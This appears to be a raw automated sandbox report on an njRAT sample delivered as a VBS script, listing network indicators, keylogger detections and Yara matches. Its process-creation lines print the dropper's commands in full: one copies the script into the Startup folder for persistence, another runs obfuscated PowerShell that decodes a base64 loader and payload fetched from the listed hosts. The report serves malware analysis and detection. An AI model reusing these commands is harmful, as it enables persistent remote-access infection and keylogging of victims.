Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251
Source: unknown	TCP traffic detected without corresponding DNS query: 198.50.177.251

Source: powershell.exe, 00000010.00000002.354766020.000002164DE68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://198.50.177.251
Source: powershell.exe, 00000010.00000002.354777323.000002164DE74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://198.50.177.251x
Source: powershell.exe, 0000000C.00000002.314810169.000001A335168000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000003.360150499.0000021C40217000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.365228820.0000021C40217000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000003.352999844.0000021665AEC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.357064949.0000021665AEC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000003.382539354.00000197607B5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.402988947.00000197607B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000010.00000002.354814544.000002164DEBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.354785224.000002164DE7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://njratcasanew.ueuo.com
Source: powershell.exe, 00000010.00000002.354785224.000002164DE7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://njratcasanew.ueuo.com/NJratNEW%20casa/base%2064%20NJratNEWcasa.txt
Source: powershell.exe, 00000010.00000002.354785224.000002164DE7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://njratcasanew.ueuo.comx
Source: powershell.exe, 00000018.00000002.401168127.00000197585F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.401637730.0000019758729000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000018.00000002.393562518.00000197488F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000C.00000002.313842082.000001A31D141000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.361050610.0000021C28191000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.353960268.000002164D941000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.387789154.0000019748581000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000018.00000002.393562518.00000197488F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000018.00000002.401637730.0000019758729000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000018.00000002.401637730.0000019758729000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000018.00000002.401637730.0000019758729000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000018.00000002.393562518.00000197488F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000018.00000002.401168127.00000197585F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.401637730.0000019758729000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown

DNS traffic detected: queries for: njratcasanew.ueuo.com

Source: global traffic	HTTP traffic detected: GET /rump/4.txt HTTP/1.1Host: 198.50.177.251Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /NJratNEW%20casa/base%2064%20NJratNEWcasa.txt HTTP/1.1Host: njratcasanew.ueuo.comConnection: Keep-Alive

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 22.0.RegSvcs.exe.400000.1.unpack, Keylogger.cs	.Net Code: VKCodeToUnicode
Source: 22.0.RegSvcs.exe.400000.3.unpack, Keylogger.cs	.Net Code: VKCodeToUnicode
Source: 22.0.RegSvcs.exe.400000.2.unpack, Keylogger.cs	.Net Code: VKCodeToUnicode
Source: 22.2.RegSvcs.exe.400000.0.unpack, Keylogger.cs	.Net Code: VKCodeToUnicode
Source: 22.0.RegSvcs.exe.400000.0.unpack, Keylogger.cs	.Net Code: VKCodeToUnicode
Source: 22.0.RegSvcs.exe.400000.4.unpack, Keylogger.cs	.Net Code: VKCodeToUnicode

E-Banking Fraud

Yara detected Njrat

Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5876, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 3016, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 16.2.powershell.exe.21665e70000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects known downloader agent Author: ditekSHen
Source: 16.2.powershell.exe.2164dccfa28.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects known downloader agent Author: ditekSHen
Source: 00000010.00000002.357567873.0000021665E70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects known downloader agent Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6844, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5608, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5876, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\Desktop\NJratccccassssG2.00.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs')
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\Desktop\NJratccccassssG2.00.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J?BM?Eg?ZwBL?C??PQ?g?Cc?JQBN?Ek?UwBx?Eg?RwBL?Fo?TQBB?CU?Jw?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?ZgB1?FU?Tg?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?Ew?S?Bn?Es?LgBy?GU?c?Bs?GE?YwBl?Cg?JwDmEEIgrC?n?Cw?JwBB?Cc?KQ?g?Ck?OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?GY?dQBV?E4?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?Gw?c?BP?FU?c?Bs?E0?c??u?FU?RwBs?Hk?bQB6?FU?Zw?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?VQBE?HM?UwBp?EQ?YgBi?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?YQBz?GE?YwBX?EU?TgB0?GE?cgBK?E4?M??y?CU?N??2?D??Mg?l?GU?cwBh?GI?LwBh?HM?YQBj?D??Mg?l?Fc?RQBO?HQ?YQBy?Eo?Tg?v?G0?bwBj?C4?bwB1?GU?dQ?u?Hc?ZQBu?GE?cwBh?GM?d?Bh?HI?agBu?C8?Lw?6?H??d?B0?Gg?Jw?p?Ck?';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('?','A') ) ).replace('%MISqHGKZMA%','TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs')
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J?BM?Eg?ZwBL?C??PQ?g?Cc?JQBN?Ek?UwBx?Eg?RwBL?Fo?TQBB?CU?Jw?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?ZgB1?FU?Tg?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?Ew?S?Bn?Es?LgBy?GU?c?Bs?GE?YwBl?Cg?JwDmEEIgrC?n?Cw?JwBB?Cc?KQ?g?Ck?OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?GY?dQBV?E4?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?Gw?c?BP?FU?c?Bs?E0?c??u?FU?RwBs?Hk?bQB6?FU?Zw?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?VQBE?HM?UwBp?EQ?YgBi?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?YQBz?GE?YwBX?EU?TgB0?GE?cgBK?E4?M??y?CU?N??2?D??Mg?l?GU?cwBh?GI?LwBh?HM?YQBj?D??Mg?l?Fc?RQBO?HQ?YQBy?Eo?Tg?v?G0?bwBj?C4?bwB1?GU?dQ?u?Hc?ZQBu?GE?cwBh?GM?d?Bh?HI?agBu?C8?Lw?6?H??d?B0?Gg?Jw?p?Ck?';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('?','A') ) ).replace('%MISqHGKZMA%','TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\Desktop\NJratccccassssG2.00.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J?BM?Eg?ZwBL?C??PQ?g?Cc?JQBN?Ek?UwBx?Eg?RwBL?Fo?TQBB?CU?Jw?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?ZgB1?FU?Tg?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?Ew?S?Bn?Es?LgBy?GU?c?Bs?GE?YwBl?Cg?JwDmEEIgrC?n?Cw?JwBB?Cc?KQ?g?Ck?OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?GY?dQBV?E4?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?Gw?c?BP?FU?c?Bs?E0?c??u?FU?RwBs?Hk?bQB6?FU?Zw?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?VQBE?HM?UwBp?EQ?YgBi?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?YQBz?GE?YwBX?EU?TgB0?GE?cgBK?E4?M??y?CU?N??2?D??Mg?l?GU?cwBh?GI?LwBh?HM?YQBj?D??Mg?l?Fc?RQBO?HQ?YQBy?Eo?Tg?v?G0?bwBj?C4?bwB1?GU?dQ?u?Hc?ZQBu?GE?cwBh?GM?d?Bh?HI?agBu?C8?Lw?6?H??d?B0?Gg?Jw?p?Ck?';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('?','A') ) ).replace('%MISqHGKZMA%','TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\Desktop\NJratccccassssG2.00.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J?BM?Eg?ZwBL?C??PQ?g?Cc?JQBN?Ek?UwBx?Eg?RwBL?Fo?TQBB?CU?Jw?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?ZgB1?FU?Tg?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?Ew?S?Bn?Es?LgBy?GU?c?Bs?GE?YwBl?Cg?JwDmEEIgrC?n?Cw?JwBB?Cc?KQ?g?Ck?OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?GY?dQBV?E4?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?Gw?c?BP?FU?c?Bs?E0?c??u?FU?RwBs?Hk?bQB6?FU?Zw?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?VQBE?HM?UwBp?EQ?YgBi?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?YQBz?GE?YwBX?EU?TgB0?GE?cgBK?E4?M??y?CU?N??2?D??Mg?l?GU?cwBh?GI?LwBh?HM?YQBj?D??Mg?l?Fc?RQBO?HQ?YQBy?Eo?Tg?v?G0?bwBj?C4?bwB1?GU?dQ?u?Hc?ZQBu?GE?cwBh?GM?d?Bh?HI?agBu?C8?Lw?6?H??d?B0?Gg?Jw?p?Ck?';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('?','A') ) ).replace('%MISqHGKZMA%','TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? 